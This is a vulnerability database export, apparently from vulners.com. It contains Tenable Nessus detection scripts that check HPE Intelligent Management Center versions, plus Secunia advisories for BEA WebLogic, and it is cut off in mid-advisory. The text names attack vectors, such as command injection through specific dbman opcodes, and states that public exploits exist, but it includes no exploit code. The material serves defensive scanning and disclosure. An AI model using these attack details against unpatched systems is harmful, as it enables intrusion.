"HP_INTELLIGENT_MANAGEMENT_CENTER_7_3_E0504P04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100869", "published": "2017-06-19T00:00:00", "title": "H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100869);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2016-7053\",\n \"CVE-2016-7054\",\n \"CVE-2016-7055\",\n \"CVE-2017-5815\",\n \"CVE-2017-5816\",\n \"CVE-2017-5817\",\n \"CVE-2017-5818\",\n \"CVE-2017-5819\",\n \"CVE-2017-5820\",\n \"CVE-2017-5821\",\n \"CVE-2017-5822\",\n \"CVE-2017-5823\",\n \"CVE-2017-8948\",\n \"CVE-2017-8956\"\n );\n script_bugtraq_id(\n 94238,\n 94242,\n 94244,\n 98469,\n 98493\n );\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03743en_us\");\n script_xref(name:\"IAVA\", value:\"2017-A-0193\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03744en_us\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03745en_us\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03746en_us\");\n script_xref(name:\"HP\", value:\"HPESBHF03743\");\n script_xref(name:\"HP\", value:\"HPESBHF03744\");\n script_xref(name:\"HP\", value:\"HPESBHF03745\");\n script_xref(name:\"HP\", value:\"HPESBHF03746\");\n\n script_name(english:\"H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of HPE Intelligent Management Center.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HPE Intelligent Management Center (iMC) PLAT installed\non the Windows host is prior to 7.3 E0504P04. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to execute arbitrary\n code. (CVE-2017-5815)\n\n - A command injection vulnerability exists in the dbman\n service due to improper validation of user-supplied\n input before it is passed to a system call. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted opcode 10008 request, to inject and\n execute arbitrary OS commands with SYSTEM privileges.\n (CVE-2017-5816)\n\n - Multiple command injection vulnerabilities exist in the\n dbman service due to improper validation of\n user-supplied input before it is passed to a system\n call. An unauthenticated, remote attacker can exploit\n these, via a specially crafted opcode 10007 request, to\n inject and execute arbitrary OS commands with SYSTEM\n privileges. (CVE-2017-5817, CVE-2017-5819)\n\n - A flaw exists in the dbman service when handling opcode\n 10007 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n delete arbitrary files with SYSTEM privileges.\n (CVE-2017-5818)\n\n - A flaw exists in the dbman service when handling opcode\n 10004 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5820)\n\n - A flaw exists in the dbman service when handling opcode\n 10006 and 10010 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially request, to execute\n arbitrary code. (CVE-2017-5821)\n\n - A flaw exists in the dbman service when handling opcode\n 10010 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5822)\n\n - A flaw exists in the dbman service when handling opcode\n 10013 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5823)\n\n - A NULL pointer deference flaw exists, specifically in\n the asn1_item_embed_d2i() function within file\n crypto/asn1/tasn_dec.c, when handling the ASN.1 CHOICE\n type, which results in a NULL value being passed to the\n structure callback if an attempt is made to free certain\n invalid encodings. An unauthenticated, remote attacker\n can exploit this to cause a denial of service condition.\n (CVE-2016-7053)\n\n - A heap overflow condition exists in the\n chacha20_poly1305_cipher() function within file\n crypto/evp/e_chacha20_poly1305.c when handling TLS\n connections using *-CHACHA20-POLY1305 cipher suites. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2016-7054)\n\n - A carry propagation error exists in the\n Broadwell-specific Montgomery multiplication procedure\n when handling input lengths divisible by but longer than\n 256 bits. This can result in transient authentication\n and key negotiation failures or reproducible erroneous\n outcomes of public-key operations with specially crafted\n input. A man-in-the-middle attacker can possibly exploit\n this issue to compromise ECDH key negotiations that\n utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified remote code execution vulnerability\n exists that allows an unauthenticated, remote attacker\n to execute arbitrary code. (CVE-2017-8948)\n\n - A stack-based buffer overflow condition exists due to\n improper validation of input when copying data. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-8956)\n\nNote that Intelligent Management Center (iMC) is an HPE product;\nhowever, it is branded as H3C.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03743en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7b8f2f9\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03744en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d91a76d\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f3805b9\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03746en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f11837c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to H3C / HPE iMC version 7.3 E0504P04 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HPE iMC dbman RestoreDBase Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:intelligent_management_center\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_intelligent_management_center_installed.nasl\");\n script_require_keys(\"installed_sw/HP Intelligent Management Center Application\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'HP Intelligent Management Center Application';\n\n# Pull the installation information from the KB.\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\npath = install['path'];\nversion = install['version'];\n# keep track of patch version for 7.3\npatchver = FALSE;\n\nbuild = get_kb_item('SMB/HP_iMC/build');\n\nfixed_display = '7.3 E0504;P04';\n\nfix = NULL;\npatchfix = NULL;\n\nif (version =~ \"^[0-6](\\.[0-9]+)*$\" || # e.g. 5, 6.999\n version =~ \"^7\\.0([0-9]|\\.[0-9]+)*$\" || # e.g. 7.01, 7.0.2\n version =~ \"^7(\\.[0-2])?$\" # e.g. 7, 7.1, 7.2\n)\n{\n fix = \"7.3\";\n}\n\n# check patch version if 7.3\nelse if (version == \"7.3\")\n{\n # Versions < 7.3 E0504P04, remove letters in patch version (if patched)\n patchparts = split(build, sep:\";\");\n if (max_index(patchparts) > 1) patchver = ereg_replace(string:build, pattern:\"[A-Z;]\", replace:\"\");\n # if it doesn't have a semicolon we got a weird version somehow.\n if (!patchver) audit(AUDIT_UNKNOWN_APP_VER, 'HP Intelligent Management Center');\n\n patchfix = \"050404\";\n}\n\n# if pre 7.3 or 7.3 with patchver before 050404\nif ((!isnull(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0) ||\n (!isnull(patchfix) && ver_compare(ver:patchver, fix:patchfix, strict:FALSE) < 0))\n{\n port = get_kb_item(\"SMB/transport\");\n if (isnull(port))\n port = 445;\n\n items = make_array(\"Installed version\", version + ' ' + build,\n \"Fixed version\", fixed_display,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:31:25", "bulletinFamily": "scanner", "description": "The version of HPE Intelligent Management Center (iMC) PLAT installed on the remote host is prior to 7.3 E0504P04. It is, therefore, affected by multiple vulnerabilities :\n\n - A NULL pointer deference flaw exists, specifically in the asn1_item_embed_d2i() function within file crypto/asn1/tasn_dec.c, when handling the ASN.1 CHOICE type, which results in a NULL value being passed to the structure callback if an attempt is made to free certain invalid encodings. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n (CVE-2016-7053)\n\n - A heap overflow condition exists in the chacha20_poly1305_cipher() function within file crypto/evp/e_chacha20_poly1305.c when handling TLS connections using *-CHACHA20-POLY1305 cipher suites. An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2016-7054)\n\n - A carry propagation error exists in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5815)\n\n - A command injection vulnerability exists in the dbman service due to improper validation of user-supplied input before it is passed to a system call. An unauthenticated, remote attacker can exploit this, via a specially crafted opcode 10008 request, to inject and execute arbitrary OS commands with SYSTEM privileges.\n (CVE-2017-5816)\n\n - Multiple command injection vulnerabilities exist in the dbman service due to improper validation of user-supplied input before it is passed to a system call. An unauthenticated, remote attacker can exploit these, via a specially crafted opcode 10007 request, to inject and execute arbitrary OS commands with SYSTEM privileges. (CVE-2017-5817, CVE-2017-5819)\n\n - A flaw exists in the dbman service when handling opcode 10007 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to delete arbitrary files with SYSTEM privileges.\n (CVE-2017-5818)\n\n - A flaw exists in the dbman service when handling opcode 10004 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5820)\n\n - A flaw exists in the dbman service when handling opcode 10006 and 10010 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially request, to execute arbitrary code. (CVE-2017-5821)\n\n - A flaw exists in the dbman service when handling opcode 10010 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5822)\n\n - A flaw exists in the dbman service when handling opcode 10013 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5823)\n\n - An unspecified remote code execution vulnerability exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-8948)\n\n - A stack-based buffer overflow condition exists due to improper validation of input when copying data. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-8956)\n\nNote that Intelligent Management Center (iMC) is an HPE product;\nhowever, it is branded as H3C.", "modified": "2018-11-15T00:00:00", "id": "HP_IMC_73_E0504P04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100868", "published": "2017-06-19T00:00:00", "title": "H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100868);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\n \"CVE-2016-7053\",\n \"CVE-2016-7054\",\n \"CVE-2016-7055\",\n \"CVE-2017-5815\",\n \"CVE-2017-5816\",\n \"CVE-2017-5817\",\n \"CVE-2017-5818\",\n \"CVE-2017-5819\",\n \"CVE-2017-5820\",\n \"CVE-2017-5821\",\n \"CVE-2017-5822\",\n \"CVE-2017-5823\",\n \"CVE-2017-8948\",\n \"CVE-2017-8956\"\n );\n script_bugtraq_id(\n 94238,\n 94242,\n 94244,\n 98469,\n 98493\n );\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03743en_us\");\n script_xref(name:\"IAVA\", value:\"2017-A-0193\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03744en_us\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03745en_us\");\n script_xref(name:\"HP\", value:\"emr_na-hpesbhf03746en_us\");\n script_xref(name:\"HP\", value:\"HPESBHF03743\");\n script_xref(name:\"HP\", value:\"HPESBHF03744\");\n script_xref(name:\"HP\", value:\"HPESBHF03745\");\n script_xref(name:\"HP\", value:\"HPESBHF03746\");\n\n script_name(english:\"H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of HPE Intelligent Management Center.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HPE Intelligent Management Center (iMC) PLAT installed\non the remote host is prior to 7.3 E0504P04. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A NULL pointer deference flaw exists, specifically in\n the asn1_item_embed_d2i() function within file\n crypto/asn1/tasn_dec.c, when handling the ASN.1 CHOICE\n type, which results in a NULL value being passed to the\n structure callback if an attempt is made to free certain\n invalid encodings. An unauthenticated, remote attacker\n can exploit this to cause a denial of service condition.\n (CVE-2016-7053)\n\n - A heap overflow condition exists in the\n chacha20_poly1305_cipher() function within file\n crypto/evp/e_chacha20_poly1305.c when handling TLS\n connections using *-CHACHA20-POLY1305 cipher suites. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2016-7054)\n\n - A carry propagation error exists in the\n Broadwell-specific Montgomery multiplication procedure\n when handling input lengths divisible by but longer than\n 256 bits. This can result in transient authentication\n and key negotiation failures or reproducible erroneous\n outcomes of public-key operations with specially crafted\n input. A man-in-the-middle attacker can possibly exploit\n this issue to compromise ECDH key negotiations that\n utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to execute arbitrary\n code. (CVE-2017-5815)\n\n - A command injection vulnerability exists in the dbman\n service due to improper validation of user-supplied\n input before it is passed to a system call. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted opcode 10008 request, to inject and\n execute arbitrary OS commands with SYSTEM privileges.\n (CVE-2017-5816)\n\n - Multiple command injection vulnerabilities exist in the\n dbman service due to improper validation of\n user-supplied input before it is passed to a system\n call. An unauthenticated, remote attacker can exploit\n these, via a specially crafted opcode 10007 request, to\n inject and execute arbitrary OS commands with SYSTEM\n privileges. (CVE-2017-5817, CVE-2017-5819)\n\n - A flaw exists in the dbman service when handling opcode\n 10007 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n delete arbitrary files with SYSTEM privileges.\n (CVE-2017-5818)\n\n - A flaw exists in the dbman service when handling opcode\n 10004 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5820)\n\n - A flaw exists in the dbman service when handling opcode\n 10006 and 10010 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially request, to execute\n arbitrary code. (CVE-2017-5821)\n\n - A flaw exists in the dbman service when handling opcode\n 10010 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5822)\n\n - A flaw exists in the dbman service when handling opcode\n 10013 requests due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2017-5823)\n\n - An unspecified remote code execution vulnerability\n exists that allows an unauthenticated, remote attacker\n to execute arbitrary code. (CVE-2017-8948)\n\n - A stack-based buffer overflow condition exists due to\n improper validation of input when copying data. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-8956)\n\nNote that Intelligent Management Center (iMC) is an HPE product;\nhowever, it is branded as H3C.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03743en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7b8f2f9\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03744en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d91a76d\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f3805b9\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03746en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f11837c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to H3C / HPE iMC version 7.3 E0504P04 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HPE iMC dbman RestoreDBase Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:intelligent_management_center\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('hp_imc_detect.nbin');\n script_require_ports('Services/activemq', 61616);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Figure out which port to use\nport = get_service(svc:'activemq', default:61616, exit_on_fail:TRUE);\nversion = get_kb_item_or_exit('hp/hp_imc/'+port+'/version');\n\napp = 'HP Intelligent Management Center';\n\nfixed_display = '7.3-E0504P04';\n\nfix = NULL;\npatchfix = NULL;\n\nif (version =~ \"^[0-6](\\.[0-9]+)*$\" || # e.g. 5, 6.999\n version =~ \"^7\\.0([0-9]|\\.[0-9]+)*$\" || # e.g. 7.01, 7.0.2\n version =~ \"^7(\\.[0-2])?$\" # e.g. 7, 7.1, 7.2\n)\n{\n fix = \"7.3\";\n}\n\n# check patch version if 7.3\nelse if (version =~ \"^7.3\\-\")\n{\n # Versions < 7.3 E0504P04, remove letters and dashes in version\n patch = pregmatch(pattern:\"[0-9.]+-E([0-9A-Z]+)\", string:version);\n if (!patch) audit(AUDIT_UNKNOWN_APP_VER, app);\n patchver = ereg_replace(string:patch[1], pattern:\"[A-Z\\-]\", replace:\".\");\n if (!patchver) audit(AUDIT_UNKNOWN_APP_VER, app);\n\n patchfix = \"0504.04\";\n}\n\n# if pre 7.3 or 7.3 with patchver before 050404\nif ((!isnull(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0) ||\n (!isnull(patchfix) && ver_compare(ver:patchver, fix:patchfix, strict:FALSE) < 0))\n{\n items = make_array(\n \"Installed version\", version,\n \"Fixed version\", fixed_display\n );\n\n order = make_list(\"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "SECURITYVULNS:VULN:14273", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14273", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow in ActiveX element.", "modified": "2006-02-24T00:00:00", "published": "2006-02-24T00:00:00", "id": "SECURITYVULNS:VULN:5823", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5823", "title": "Adobe Macromedia Shockwave ActiveX element buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nBEA WebLogic Server/Express Vulnerabilities and Security Issues\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18592\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18592/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nSecurity Bypass, Exposure of system information, Exposure of\r\nsensitive information, DoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nBEA WebLogic Server 9.x\r\nhttp://secunia.com/product/5822/\r\nBEA WebLogic Server 8.x\r\nhttp://secunia.com/product/1360/\r\nBEA WebLogic Server 7.x\r\nhttp://secunia.com/product/754/\r\nBEA WebLogic Server 6.x\r\nhttp://secunia.com/product/753/\r\nBEA WebLogic Express 9.x\r\nhttp://secunia.com/product/5823/\r\nBEA WebLogic Express 8.x\r\nhttp://secunia.com/product/1843/\r\nBEA WebLogic Express 7.x\r\nhttp://secunia.com/product/1282/\r\nBEA WebLogic Express 6.x\r\nhttp://secunia.com/product/1281/\r\n\r\nDESCRIPTION:\r\nMultiple vulnerabilities and security issues have been reported in\r\nWebLogic Server and WebLogic Express, where the most critical ones\r\npotentially can be exploited by malicious people to cause a DoS\r\n(Denial of Service), disclose sensitive information, and bypass\r\ncertain security restrictions.\r\n\r\n1) An error in the MBean protection can be exploited by a malicious\r\nJava client to access protected MBean attributes or cause DoS on a\r\nvulnerable server via RMI (Remote Method Invocation).\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server 8.1 through Service Pack 4 (all platforms)\r\n* WebLogic Server 7.0 through Service Pack 6 (all platforms)\r\n* WebLogic Server 6.1 through Service Pack 7 (all platforms)\r\n\r\n2) The server log is not properly protected and may be viewed by\r\nmalicious users.\r\n\r\nSuccessful exploitation requires that the user has been authenticated\r\n(there may exist a guest account for domains upgraded from WebLogic\r\nServer 6.x).\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server 8.1 through Service Pack 4 (all platforms)\r\n* WebLogic Server 7.0 through Service Pack 6 (all platforms)\r\n* WebLogic Server 6.1 through Service Pack 7 (all platforms)\r\n\r\n3) When a password change occurs, the WebLogic Auditing provider\r\nwrites the old and new password in clear-text to the\r\n"DefaultAuditRecorder.log" file and potentially other audit\r\nproviders' audit stores.\r\n\r\nSuccessful exploitation requires that the site has enabled\r\nconfiguration auditing.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server 8.1 through Service Pack 4 (all platforms)\r\n\r\n4) System passwords are not properly protected from being decrypted.\r\nThis can be exploited to decrypt system passwords via a malicious\r\napplication (e.g. EJBs or servlets) installed on the server .\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server 9.0 (all platforms)\r\n* WebLogic Server 8.1 through Service Pack 5 (all platforms)\r\n\r\n5) A new security provider, which has been configured, is not\r\nactivated until the server reboots. This may cause users and security\r\npolicies to be added or removed to a non-active provider.\r\n\r\nThe security issue affects the following version:\r\n* WebLogic Server 9.0 (all platforms)\r\n\r\n6) The usage of connection filters may in certain situations cause\r\nthe server performance to decrease.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server 9.0 (all platforms)\r\n* WebLogic Server 8.1 through Service Pack 5 (all platforms)\r\n* WebLogic Server 7.0 through Service Pack 6 (all platforms)\r\n\r\n7) An error in the protection of the server's SSL identity can be\r\nexploited to obtain the SSL identity via a malicious application\r\nrunning on the server.\r\n\r\nThe vulnerability affects the following version:\r\n* WebLogic Server 8.1 Service Pack 5\r\n\r\n8) Certain security policies added via the console by the\r\nadministrator does not properly protect JNDI resources. This may be\r\nexploited by malicious people to access certain restricted\r\nresources.\r\n\r\nThe security issue affects the following version:\r\n* WebLogic Server 9.0 (all platforms)\r\n\r\nSOLUTION:\r\nApply patches and service packs (see the original vendor advisories).\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\n1) http://dev2dev.bea.com/pub/advisory/166\r\n2) http://dev2dev.bea.com/pub/advisory/168\r\n3) http://dev2dev.bea.com/pub/advisory/170\r\n4) http://dev2dev.bea.com/pub/advisory/171\r\n5) http://dev2dev.bea.com/pub/advisory/173\r\n6) http://dev2dev.bea.com/pub/advisory/174\r\n7) http://dev2dev.bea.com/pub/advisory/175\r\n8) http://dev2dev.bea.com/pub/advisory/176\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "id": "SECURITYVULNS:DOC:11170", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11170", "title": "[SA18592] BEA WebLogic Server/Express Vulnerabilities and Security Issues", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nBEA WebLogic 24 Vulnerabilities and Security Issues\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17138\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17138/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nSecurity Bypass, Cross Site Scripting, Manipulation of data, Brute\r\nforce, Exposure of system information, Exposure of sensitive\r\ninformation, Privilege escalation, DoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nBEA WebLogic Server 9.x\r\nhttp://secunia.com/product/5822/\r\nBEA WebLogic Server 8.x\r\nhttp://secunia.com/product/1360/\r\nBEA WebLogic Server 7.x\r\nhttp://secunia.com/product/754/\r\nBEA WebLogic Server 6.x\r\nhttp://secunia.com/product/753/\r\nBEA WebLogic Express 9.x\r\nhttp://secunia.com/product/5823/\r\nBEA WebLogic Express 8.x\r\nhttp://secunia.com/product/1843/\r\nBEA WebLogic Express 7.x\r\nhttp://secunia.com/product/1282/\r\nBEA WebLogic Express 